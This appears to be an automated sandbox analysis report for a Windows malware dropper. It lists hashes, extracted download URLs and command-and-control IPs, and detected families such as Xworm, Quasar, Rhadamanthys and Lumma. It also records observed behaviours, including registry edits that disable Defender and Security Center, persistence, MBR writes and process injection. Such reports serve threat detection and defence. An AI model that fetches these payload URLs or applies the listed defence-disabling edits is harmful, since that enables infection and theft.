Analysis
max time kernel: 150s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 10-04-2024 22:15
Static task: static1
Behavioral task: behavioral1
Sample: 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe
Resource: win7-20240221-en
General
Target: 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe
Size: 12KB
MD5: 55dba6e7aa4e8cc73415f4e3f9f6bdae
SHA1: 87c9f29d58f57a5e025061d389be2655ee879d5d
SHA256: 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a
SHA512: f2eb91e812b2ba58c4309fd44edadc8977367c7d9d6214d7e70a0392ae8427d570746ae57cca68dc260901f664f2e8c6c5387118ff01d243abeb5680abe2a352
SSDEEP: 192:vnpYaU28zxHdo4ZMgQl9q+4ua7HhdSbwxz1ULU87glpK/b26J4Uf1XXr5:vWZdoWMR96uaLhM6ULU870gJR
Malware Config
Extracted
https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe
Extracted: gcleaner
185.172.128.90
5.42.65.64
url_path: /advdlc.php
Extracted: phorphiex
http://185.215.113.66/
Extracted: lumma
Signatures
Detect Xworm Payload 1 IoCs
resource | yara_rule
behavioral2/files/0x0003000000021166-1627.dat | family_xworm
Modifies security service 2 TTPs 2 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "3" | httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" | httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Quasar payload 1 IoCs
resource | yara_rule
behavioral2/files/0x000e000000023390-374.dat | family_quasar
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 5572 created 2524 | 5572 | RegAsm.exe | 42
Windows security bypass 18 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | http185.215.113.66newtpp.exe.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | http185.215.113.66newtpp.exe.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | http185.215.113.66newtpp.exe.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | 1002628022.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | 2770021532.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | 2770021532.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | 2770021532.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | http185.215.113.66newtpp.exe.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | 1002628022.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | 1002628022.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | 2770021532.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | http185.215.113.66newtpp.exe.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | 1002628022.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | 2770021532.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | http185.215.113.66newtpp.exe.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | 1002628022.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | 2770021532.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | 1002628022.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | http185.215.113.46costrandom.exe.exe
Blocklisted process makes network request 6 IoCs
flow | pid | Process
109 | 2548 | powershell.exe
148 | 5844 | powershell.exe
152 | 6088 | powershell.exe
155 | 2316 | powershell.exe
174 | 5888 | powershell.exe
199 | 5696 | powershell.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
pid | Process
5456 | netsh.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | http185.215.113.46costrandom.exe.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | http185.215.113.46costrandom.exe.exe
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | wscript.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | httpguatemalacayerealestate.combatushkainte.exe.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | httpsfile-drop.ccD5d2a75Tester.exe.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | httpsfile-drop.ccD24e534svchost.exe.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe
Drops startup file 2 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3297cda814fb30a725f976420f48da21.exe | httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3297cda814fb30a725f976420f48da21.exe | httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Executes dropped EXE 36 IoCs
pid | Process
1968 | http185.215.113.66newtpp.exe.exe
3156 | httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe
2724 | http185.215.113.66pei.exe.exe
3580 | http185.196.8.137tesgs.exe.exe
3076 | httpguatemalacayerealestate.combatushkainte.exe.exe
4552 | httpra-ftp.ruimages1.jpg.exe
3728 | http185.215.113.46negravegan.exe.exe
3528 | http185.215.113.46costrandom.exe.exe
884 | 3013831348.exe
780 | httproundcube.custommarinesvcs.comklounada.exe.exe
3824 | 1002628022.exe
3928 | 2770021532.exe
4336 | httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe
5300 | httpfiles.offshore.catfxYvCG6c.exe.exe
5488 | 275354733.exe
5580 | httpfiles.offshore.catDSKeOWN1.exe.exe
5868 | httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
5036 | httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
5180 | 1793913919.exe
4320 | RuntimeBroker2.exe
5244 | 667029277.exe
1608 | $embr-client.exe
4584 | 2321415439.exe
3088 | RuntimeBroker2.exe
3840 | 3216420798.exe
5824 | http88.218.61.2191234.exe.exe
5876 | http185.172.128.59ISetup8.exe.exe
5284 | http185.172.128.59ISetup2.exe.exe
5680 | httpsfile-drop.ccD5d2a75Tester.exe.exe
6124 | httpsfile-drop.ccD24e534svchost.exe.exe
4956 | http88.218.61.2191111.exe.exe
5964 | http88.218.61.219test2.exe.exe
2004 | httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
4960 | http88.218.61.219555.exe.exe
5580 | svchost.exe
3076 | svchost.exe
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Software\Wine | http185.215.113.46costrandom.exe.exe
resource | yara_rule
behavioral2/files/0x0007000000023371-195.dat | vmprotect
behavioral2/memory/780-223-0x0000000000020000-0x000000000090E000-memory.dmp | vmprotect
behavioral2/memory/780-222-0x0000000000020000-0x000000000090E000-memory.dmp | vmprotect
Windows security modification 26 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | http185.215.113.66newtpp.exe.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | 1002628022.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection | httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | http185.215.113.66newtpp.exe.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | http185.215.113.66newtpp.exe.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | 2770021532.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | 1002628022.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | 1002628022.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | 1002628022.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | 2770021532.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | 2770021532.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | 1002628022.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | http185.215.113.66newtpp.exe.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | 1002628022.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | http185.215.113.66newtpp.exe.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | 2770021532.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features | httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware = "1" | httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | http185.215.113.66newtpp.exe.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | 1002628022.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | 2770021532.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | 2770021532.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | 2770021532.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | http185.215.113.66newtpp.exe.exe
Adds Run key to start application 2 TTPs 9 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysdinrdvs.exe" | http185.215.113.66newtpp.exe.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\syspplsvc.exe" | 1002628022.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\syspplsvc.exe" | 1002628022.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Windows\\winakrosvsa.exe" | 2770021532.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Users\\Admin\\winakrosvsa.exe" | 2770021532.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3297cda814fb30a725f976420f48da21 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe\" .." | httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysdinrdvs.exe" | http185.215.113.66newtpp.exe.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker2 = "C:\\Users\\Admin\\AppData\\Local\\RuntimeBroker2.exe" | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\3297cda814fb30a725f976420f48da21 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe\" .." | httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description | ioc | Process
File opened for modification | \??\PHYSICALDRIVE0 | httpra-ftp.ruimages1.jpg.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid | Process
3528 | http185.215.113.46costrandom.exe.exe
Suspicious use of SetThreadContext 3 IoCs
description | pid | Process | procid_target
PID 5300 set thread context of 0 | 5300 | httpfiles.offshore.catfxYvCG6c.exe.exe |
PID 4776 set thread context of 5572 | 4776 | powershell.exe | 152
PID 1608 set thread context of 0 | 1608 | $embr-client.exe |
Drops file in Windows directory 13 IoCs
description | ioc | Process
File created | C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe | powershell.exe
File opened for modification | C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe | powershell.exe
File opened for modification | C:\Windows\svchost.exe | httpsfile-drop.ccD5d2a75Tester.exe.exe
File opened for modification | C:\Windows\syspplsvc.exe | 1002628022.exe
File created | C:\Windows\winakrosvsa.exe | 2770021532.exe
File created | C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe | powershell.exe
File created | C:\Windows\svchost.exe | httpsfile-drop.ccD5d2a75Tester.exe.exe
File created | C:\Windows\syspplsvc.exe | 1002628022.exe
File opened for modification | C:\Windows\winakrosvsa.exe | 2770021532.exe
File created | C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe | powershell.exe
File created | C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe | powershell.exe
File created | C:\Windows\sysdinrdvs.exe | http185.215.113.66newtpp.exe.exe
File opened for modification | C:\Windows\sysdinrdvs.exe | http185.215.113.66newtpp.exe.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 9 IoCs
pid | pid_target | Process | procid_target
3888 | 3076 | WerFault.exe | 102
1456 | 3076 | WerFault.exe | 102
2124 | 3076 | WerFault.exe | 102
2636 | 3076 | WerFault.exe | 102
2256 | 3076 | WerFault.exe | 102
3632 | 3076 | WerFault.exe | 102
4448 | 3076 | WerFault.exe | 102
3928 | 3076 | WerFault.exe | 102
5484 | 5572 | WerFault.exe | 152
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
5688 | schtasks.exe
5832 | schtasks.exe
6112 | schtasks.exe
Delays execution with timeout.exe 4 IoCs
pid | Process
5560 | timeout.exe
3348 | timeout.exe
6024 | timeout.exe
5972 | timeout.exe
Kills process with taskkill 1 IoCs
pid | Process
4336 | taskkill.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
3156 | httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe
3156 | httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe
3528 | http185.215.113.46costrandom.exe.exe
3528 | http185.215.113.46costrandom.exe.exe
2548 | powershell.exe
2548 | powershell.exe
2548 | powershell.exe
2692 | powershell.exe
2692 | powershell.exe
2692 | powershell.exe
780 | httproundcube.custommarinesvcs.comklounada.exe.exe
780 | httproundcube.custommarinesvcs.comklounada.exe.exe
4776 | powershell.exe
4776 | powershell.exe
4776 | powershell.exe
4652 | powershell.exe
4652 | powershell.exe
4652 | powershell.exe
1576 | powershell.exe
1576 | powershell.exe
4336 | httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe
4336 | httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe
1912 | powershell.exe
1912 | powershell.exe
2256 | powershell.exe
2256 | powershell.exe
1912 | powershell.exe
2256 | powershell.exe
5384 | powershell.exe
5384 | powershell.exe
5500 | powershell.exe
5500 | powershell.exe
5384 | powershell.exe
5500 | powershell.exe
5868 | httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
5868 | httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
5844 | powershell.exe
5844 | powershell.exe
5036 | httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
5036 | httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
5844 | powershell.exe
5572 | RegAsm.exe
5572 | RegAsm.exe
5888 | dialer.exe
5888 | dialer.exe
5888 | dialer.exe
5888 | dialer.exe
6088 | powershell.exe
6088 | powershell.exe
6088 | powershell.exe
5684 | powershell.exe
5684 | powershell.exe
5684 | powershell.exe
2788 | powershell.exe
2788 | powershell.exe
2316 | powershell.exe
2316 | powershell.exe
2788 | powershell.exe
2316 | powershell.exe
5888 | powershell.exe
5888 | powershell.exe
5888 | powershell.exe
5696 | powershell.exe
5696 | powershell.exe
Suspicious behavior: SetClipboardViewer 1 IoCs
pid | Process
3824 | 1002628022.exe
Suspicious use of AdjustPrivilegeToken 49 IoCs
description | pid | Process
Token: SeDebugPrivilege | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe
Token: SeDebugPrivilege | 3156 | httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe
Token: SeDebugPrivilege | 2548 | powershell.exe
Token: SeDebugPrivilege | 2692 | powershell.exe
Token: SeDebugPrivilege | 4776 | powershell.exe
Token: SeDebugPrivilege | 4652 | powershell.exe
Token: SeDebugPrivilege | 4336 | taskkill.exe
Token: SeDebugPrivilege | 1576 | powershell.exe
Token: SeDebugPrivilege | 4336 | httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe
Token: SeDebugPrivilege | 1912 | powershell.exe
Token: SeDebugPrivilege | 2256 | powershell.exe
Token: SeDebugPrivilege | 5300 | httpfiles.offshore.catfxYvCG6c.exe.exe
Token: SeDebugPrivilege | 5384 | powershell.exe
Token: SeDebugPrivilege | 5500 | powershell.exe
Token: SeDebugPrivilege | 5868 | httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Token: SeImpersonatePrivilege | 5868 | httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Token: SeDebugPrivilege | 5844 | powershell.exe
Token: SeDebugPrivilege | 6088 | powershell.exe
Token: SeDebugPrivilege | 1608 | $embr-client.exe
Token: SeDebugPrivilege | 5684 | powershell.exe
Token: SeDebugPrivilege | 2788 | powershell.exe
Token: SeDebugPrivilege | 2316 | powershell.exe
Token: SeDebugPrivilege | 5888 | powershell.exe
Token: SeDebugPrivilege | 5696 | powershell.exe
Token: SeDebugPrivilege | 5680 | httpsfile-drop.ccD5d2a75Tester.exe.exe
Token: SeDebugPrivilege | 6124 | httpsfile-drop.ccD24e534svchost.exe.exe
Token: SeBackupPrivilege | 5712 | vssvc.exe
Token: SeRestorePrivilege | 5712 | vssvc.exe
Token: SeAuditPrivilege | 5712 | vssvc.exe
Token: SeDebugPrivilege | 2004 | httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: SeDebugPrivilege | 4576 | powershell.exe
Token: SeDebugPrivilege | 6124 | httpsfile-drop.ccD24e534svchost.exe.exe
Token: SeDebugPrivilege | 6056 | powershell.exe
Token: SeDebugPrivilege | 5580 | svchost.exe
Token: SeDebugPrivilege | 3076 | svchost.exe
Token: SeDebugPrivilege | 3076 | svchost.exe
Token: 33 | 2004 | httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: SeIncBasePriorityPrivilege | 2004 | httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: SeDebugPrivilege | 3076 | svchost.exe
Token: 33 | 2004 | httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: SeIncBasePriorityPrivilege | 2004 | httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: 33 | 2004 | httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: SeIncBasePriorityPrivilege | 2004 | httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: 33 | 2004 | httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: SeIncBasePriorityPrivilege | 2004 | httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: 33 | 2004 | httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: SeIncBasePriorityPrivilege | 2004 | httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: 33 | 2004 | httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: SeIncBasePriorityPrivilege | 2004 | httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Suspicious use of SetWindowsHookEx 2 IoCs
pid | Process
6124 | httpsfile-drop.ccD24e534svchost.exe.exe
3076 | svchost.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 928 wrote to memory of 1968 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 97
PID 928 wrote to memory of 1968 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 97
PID 928 wrote to memory of 1968 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 97
PID 928 wrote to memory of 3156 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 98
PID 928 wrote to memory of 3156 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 98
PID 928 wrote to memory of 3156 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 98
PID 928 wrote to memory of 2724 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 96
PID 928 wrote to memory of 2724 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 96
PID 928 wrote to memory of 2724 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 96
PID 928 wrote to memory of 3580 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 100
PID 928 wrote to memory of 3580 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 100
PID 928 wrote to memory of 3580 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 100
PID 928 wrote to memory of 3076 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 102
PID 928 wrote to memory of 3076 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 102
PID 928 wrote to memory of 3076 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 102
PID 3156 wrote to memory of 1536 | 3156 | httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe | 103
PID 3156 wrote to memory of 1536 | 3156 | httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe | 103
PID 3156 wrote to memory of 1536 | 3156 | httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe | 103
PID 1536 wrote to memory of 2548 | 1536 | cmd.exe | 105
PID 1536 wrote to memory of 2548 | 1536 | cmd.exe | 105
PID 1536 wrote to memory of 2548 | 1536 | cmd.exe | 105
PID 928 wrote to memory of 4552 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 106
PID 928 wrote to memory of 4552 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 106
PID 928 wrote to memory of 4552 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 106
PID 928 wrote to memory of 3528 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 107
PID 928 wrote to memory of 3528 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 107
PID 928 wrote to memory of 3528 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 107
PID 928 wrote to memory of 3728 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 108
PID 928 wrote to memory of 3728 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 108
PID 928 wrote to memory of 3728 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 108
PID 3580 wrote to memory of 2508 | 3580 | http185.196.8.137tesgs.exe.exe | 117
PID 3580 wrote to memory of 2508 | 3580 | http185.196.8.137tesgs.exe.exe | 117
PID 3580 wrote to memory of 2508 | 3580 | http185.196.8.137tesgs.exe.exe | 117
PID 2508 wrote to memory of 1364 | 2508 | wscript.exe | 110
